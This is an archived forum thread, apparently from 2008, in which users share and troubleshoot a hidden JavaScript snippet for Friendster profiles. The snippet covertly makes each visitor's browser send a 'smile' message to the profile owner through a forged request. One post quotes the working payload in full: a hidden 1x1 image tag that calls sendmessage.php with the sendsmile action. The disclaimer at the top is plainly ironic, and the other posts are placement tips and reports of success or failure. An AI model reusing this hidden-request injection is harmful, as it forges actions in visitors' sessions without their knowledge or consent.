• ARCHIVES 
  • » [quote][b][color=grey]disclaimer: for educational purposes only :lol: [/color][/b][/quote] The code will work if hidden in a sidebar or innerHTML :cool: :thumbsup: wvm smiley will work with this code

Pages: 1234

[quote][b][color=grey]disclaimer: for educational purposes only :lol: [/color][/b][/quote] The code will work if hidden in a sidebar or innerHTML :cool: :thumbsup: wvm smiley will work with this code

0b3
» n00b
FTalk Level: zero
84
0
1969-12-31

Re: [quote][b][color=grey]disclaimer: for educational purposes only :lol: [/color][/b][/quote] The code will work if hidden in a sidebar or innerHTML :cool: :thumbsup: wvm smiley will work with this code

u mean at the very top of all my codes?
Lordheinz
» FTalkElite
FTalk Level: zero
4377
0
1969-12-31

Re: [quote][b][color=grey]disclaimer: for educational purposes only :lol: [/color][/b][/quote] The code will work if hidden in a sidebar or innerHTML :cool: :thumbsup: wvm smiley will work with this code

^ after your css injector(if you have),just before your onload handler..
kangkong10
» FTalkManiac
FTalk Level: zero
617
0
1969-12-31

Re: [quote][b][color=grey]disclaimer: for educational purposes only :lol: [/color][/b][/quote] The code will work if hidden in a sidebar or innerHTML :cool: :thumbsup: wvm smiley will work with this code

[quote=lordheinz]^ you dont have to put inside your loader,put it before...:thumbsup:[/quote] ok thanks..
0b3
» n00b
FTalk Level: zero
84
0
1969-12-31

Re: [quote][b][color=grey]disclaimer: for educational purposes only :lol: [/color][/b][/quote] The code will work if hidden in a sidebar or innerHTML :cool: :thumbsup: wvm smiley will work with this code

uhm okay... will try it... ahehe.. it seems there are two of us in here needing help...
recoba20
» n00b
FTalk Level: zero
36
0
1969-12-31

Re: [quote][b][color=grey]disclaimer: for educational purposes only :lol: [/color][/b][/quote] The code will work if hidden in a sidebar or innerHTML :cool: :thumbsup: wvm smiley will work with this code

I've tried to put on the top of my js (the other js file is visitor's log, there's no css injector), but it doesnt work. do I need to update my profile again (update the media box) to update the javascript of my friendster? EDITED: I've tried in another profile with my js containing only this code, but it still doesnt work.. :crybaby:

Last edited by recoba20 (2008-03-04 00:44:09)

eggirl
» n00b
FTalk Level: zero
2
0
1969-12-31

Re: [quote][b][color=grey]disclaimer: for educational purposes only :lol: [/color][/b][/quote] The code will work if hidden in a sidebar or innerHTML :cool: :thumbsup: wvm smiley will work with this code

wer will i put the direct link url?
kangkong10
» FTalkManiac
FTalk Level: zero
617
0
1969-12-31

Re: [quote][b][color=grey]disclaimer: for educational purposes only :lol: [/color][/b][/quote] The code will work if hidden in a sidebar or innerHTML :cool: :thumbsup: wvm smiley will work with this code

[quote=eggirl]wer will i put the direct link url?[/quote] put it in ur JS file. :thumbsup:
eggirl
» n00b
FTalk Level: zero
2
0
1969-12-31

Re: [quote][b][color=grey]disclaimer: for educational purposes only :lol: [/color][/b][/quote] The code will work if hidden in a sidebar or innerHTML :cool: :thumbsup: wvm smiley will work with this code

i already put it there, then wat will i do nxt?
lilprincess950
» FTalkManiac
FTalk Level: zero
771
0
1969-12-31

Re: [quote][b][color=grey]disclaimer: for educational purposes only :lol: [/color][/b][/quote] The code will work if hidden in a sidebar or innerHTML :cool: :thumbsup: wvm smiley will work with this code

Nice...for those people who were using the old will be looking for this..Great shak.:thumbsup:
bubwit
» n00b
FTalk Level: zero
51
0
1969-12-31

Re: [quote][b][color=grey]disclaimer: for educational purposes only :lol: [/color][/b][/quote] The code will work if hidden in a sidebar or innerHTML :cool: :thumbsup: wvm smiley will work with this code

Sir shakiro! or anyone expert with WVM via send smile.. I am a big fan of WVM via send smiley..cuz i found it alot easier and simpler than the original WVM trick...but lately I'm having problems making this simple code work on my profile (the send smiley WVM)..the code is working but my page abort too quickly giving an error in viewing my profile..but i know it's working cuz i will find my inbox full of the smiles from my friends attempting to view my page..but couldn't due to the error msg.. as shown: [img]http://img.photobucket.com/albums/v288/bubwit/error.jpg[/img] I've used only one code all the time ur send smile with CSS injection-- sometimes it's working for some of my friends..others it dosn't: <">then I found out about this New updated code..so I just replaced it but this time the error msg is all the time and to all my friends: <">Maybe I didn't apply it right? what can i do to make it simpley work for me? I couldn't really understand when u said:[quote]The code will work if hidden in a sidebar or innerHTML wvm smiley will work with this code I've just made & tested[/quote] I'm really hoping you would help me to sort this out or anyone else .. and I have another enquiry, does this work with only the frineds(meaning u recieve smiles from all the ppl who viewed u even if ther not on ur list of friends?) if it's in public? just wondering..:question: thanks alot!
Bluephoenix
» n00b
FTalk Level: zero
18
0
1969-12-31

Re: [quote][b][color=grey]disclaimer: for educational purposes only :lol: [/color][/b][/quote] The code will work if hidden in a sidebar or innerHTML :cool: :thumbsup: wvm smiley will work with this code

Hello! var smyler = document.getElementById("2"); var wvmsmyle="<div id='commonbox wvmsmyle' style='visibility:hidden;height:0px;'><img src='http://www.friendster.com/sendmessage.php?uid="[b]+pageOwnerID[/b]+"&action=sendsmile&_submitted=1' width='1' height='1'/></div>"; var smyl = document.createElement("li"); smyl.innerHTML=wvmsmyle; smyler.parentNode.insertBefore(smyl,smyler); Do I have to replace the pageownerID with my own userID?

Last edited by Bluephoenix (2008-03-26 05:02:57)

JeRkZxxx
» n00b
FTalk Level: zero
92
0
1969-12-31

Re: [quote][b][color=grey]disclaimer: for educational purposes only :lol: [/color][/b][/quote] The code will work if hidden in a sidebar or innerHTML :cool: :thumbsup: wvm smiley will work with this code

Any preview.../??? =D
a7xboyz
» Banned
FTalk Level: zero
3
0
1969-12-31

Re: [quote][b][color=grey]disclaimer: for educational purposes only :lol: [/color][/b][/quote] The code will work if hidden in a sidebar or innerHTML :cool: :thumbsup: wvm smiley will work with this code

thank's for the trick
nhickz31
» n00b
FTalk Level: zero
13
0
1969-12-31

Re: [quote][b][color=grey]disclaimer: for educational purposes only :lol: [/color][/b][/quote] The code will work if hidden in a sidebar or innerHTML :cool: :thumbsup: wvm smiley will work with this code

gotta try it in my profile...
arip
» FTalker
FTalk Level: zero
198
0
1969-12-31

Re: [quote][b][color=grey]disclaimer: for educational purposes only :lol: [/color][/b][/quote] The code will work if hidden in a sidebar or innerHTML :cool: :thumbsup: wvm smiley will work with this code

must try this... thanks buddy...=) :thumbsup:
mandose_sama
» n00b
FTalk Level: zero
13
0
1969-12-31

Re: [quote][b][color=grey]disclaimer: for educational purposes only :lol: [/color][/b][/quote] The code will work if hidden in a sidebar or innerHTML :cool: :thumbsup: wvm smiley will work with this code

is this code stil working?? coz i juz figured out dat, not all my visitor will auto send smile lately....
adepat
» FTalker
FTalk Level: zero
266
0
1969-12-31

Re: [quote][b][color=grey]disclaimer: for educational purposes only :lol: [/color][/b][/quote] The code will work if hidden in a sidebar or innerHTML :cool: :thumbsup: wvm smiley will work with this code

thanks for the tricks... =)
bobcbar
» FTalkElite
FTalk Level: zero
5223
0
1969-12-31

Re: [quote][b][color=grey]disclaimer: for educational purposes only :lol: [/color][/b][/quote] The code will work if hidden in a sidebar or innerHTML :cool: :thumbsup: wvm smiley will work with this code

[quote=mandose_sama]is this code stil working?? coz i juz figured out dat, not all my visitor will auto send smile lately....[/quote] Yes it still works but never works for every visitor, don't know why.
Bluephoenix
» n00b
FTalk Level: zero
18
0
1969-12-31

Re: [quote][b][color=grey]disclaimer: for educational purposes only :lol: [/color][/b][/quote] The code will work if hidden in a sidebar or innerHTML :cool: :thumbsup: wvm smiley will work with this code

I think the code doesn't work anymore. It stopped working when I uploaded pictures in my profile. Sigh... Are there any updated codes for WVM smile? Sir Ephe? Sir Bob?
bobcbar
» FTalkElite
FTalk Level: zero
5223
0
1969-12-31

Re: [quote][b][color=grey]disclaimer: for educational purposes only :lol: [/color][/b][/quote] The code will work if hidden in a sidebar or innerHTML :cool: :thumbsup: wvm smiley will work with this code

[quote=Bluephoenix]I think the code doesn't work anymore. It stopped working when I uploaded pictures in my profile. Sigh... Are there any updated codes for WVM smile? Sir Ephe? Sir Bob?[/quote] This code was still working before, did you update ur linker code?
  • ARCHIVES 
  • » [quote][b][color=grey]disclaimer: for educational purposes only :lol: [/color][/b][/quote] The code will work if hidden in a sidebar or innerHTML :cool: :thumbsup: wvm smiley will work with this code

Pages: 1234

Board footer

© 2024 F Talk

Current time is 08:21

[ 9 queries - 0.048 second ]
Privacy Policy